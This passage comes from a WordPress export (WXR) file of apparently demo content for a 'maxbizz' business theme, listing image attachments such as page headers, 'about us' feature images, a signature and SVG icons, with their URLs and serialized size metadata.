		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:28:"2020/09/pheader-contacts.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:27:"pheader-contacts-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"pheader-contacts-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:28:"pheader-contacts-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"pheader-contacts-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:29:"pheader-contacts-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:28:"pheader-contacts-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:28:"pheader-contacts-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image-contacts</title>
		<link>http://wpdemo.archiwp.com/maxbizz/contacts/image-contacts/</link>
		<pubDate>Fri, 04 Sep 2020 10:51:41 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image-contacts.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>465</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 10:51:41]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 10:51:41]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image-contacts]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>455</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image-contacts.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image-contacts.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:849;s:6:"height";i:878;s:4:"file";s:26:"2020/09/image-contacts.png";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:26:"image-contacts-290x300.png";s:5:"width";i:290;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"image-contacts-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:12:"medium_large";a:4:{s:4:"file";s:26:"image-contacts-768x794.png";s:5:"width";i:768;s:6:"height";i:794;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"image-contacts-600x400.png";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"image-contacts-600x600.png";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:26:"image-contacts-100x100.png";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:9:"image/png";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:26:"image-contacts-100x100.png";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-typo</title>
		<link>http://wpdemo.archiwp.com/maxbizz/typography/pheader-typo/</link>
		<pubDate>Mon, 07 Sep 2020 04:22:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-typo.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>473</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 04:22:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 04:22:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-typo]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>471</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-typo.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-typo.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:24:"2020/09/pheader-typo.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:23:"pheader-typo-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"pheader-typo-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"pheader-typo-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"pheader-typo-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:25:"pheader-typo-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-typo-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-typo-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>down-arrow</title>
		<link>http://wpdemo.archiwp.com/maxbizz/typography/down-arrow/</link>
		<pubDate>Mon, 07 Sep 2020 08:24:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/down-arrow.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>480</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 08:24:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 08:24:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[down-arrow]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>471</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/down-arrow.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/down-arrow.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>add</title>
		<link>http://wpdemo.archiwp.com/maxbizz/typography/add/</link>
		<pubDate>Mon, 07 Sep 2020 08:50:32 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/add.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>481</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 08:50:32]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 08:50:32]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[add]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>471</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/add.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/add.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz/about-us/pheader-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 09:01:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>489</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 09:01:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 09:01:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:28:"2020/09/pheader-about-us.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:27:"pheader-about-us-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"pheader-about-us-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:28:"pheader-about-us-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"pheader-about-us-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:29:"pheader-about-us-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:28:"pheader-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:28:"pheader-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz/about-us/image1-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 09:25:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>491</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 09:25:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 09:25:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image1-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:630;s:6:"height";i:475;s:4:"file";s:27:"2020/09/image1-about-us.jpg";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:27:"image1-about-us-300x226.jpg";s:5:"width";i:300;s:6:"height";i:226;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"image1-about-us-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"image1-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"image1-about-us-600x475.jpg";s:5:"width";i:600;s:6:"height";i:475;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:27:"image1-about-us-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"image1-about-us-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>signature</title>
		<link>http://wpdemo.archiwp.com/maxbizz/about-us/signature/</link>
		<pubDate>Mon, 07 Sep 2020 09:30:55 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/signature.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>492</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 09:30:55]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 09:30:55]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[signature]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/signature.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/signature.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:204;s:6:"height";i:52;s:4:"file";s:21:"2020/09/signature.png";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"signature-150x52.png";s:5:"width";i:150;s:6:"height";i:52;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>features1-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz/about-us/features1-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 10:47:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/features1-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>501</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 10:47:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 10:47:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[features1-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/features1-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/features1-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:497;s:4:"file";s:30:"2020/09/features1-about-us.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:30:"features1-about-us-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"features1-about-us-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"features1-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"features1-about-us-600x497.jpg";s:5:"width";i:600;s:6:"height";i:497;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>features2-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz/about-us/features2-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 10:47:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/features2-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>502</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 10:47:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 10:47:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[features2-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/features2-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/features2-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:497;s:4:"file";s:30:"2020/09/features2-about-us.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:30:"features2-about-us-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"features2-about-us-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"features2-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"features2-about-us-600x497.jpg";s:5:"width";i:600;s:6:"height";i:497;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>features3-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz/about-us/features3-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 10:47:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/features3-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>503</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 10:47:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 10:47:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[features3-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/features3-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/features3-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:497;s:4:"file";s:30:"2020/09/features3-about-us.jpg";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:30:"features3-about-us-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"features3-about-us-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"features3-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"features3-about-us-600x497.jpg";s:5:"width";i:600;s:6:"height";i:497;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz/about-us/bg1-about-us/</link>
		<pubDate>Mon, 07 Sep 2020 10:49:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-about-us.jpg</guid>
		<description></description>
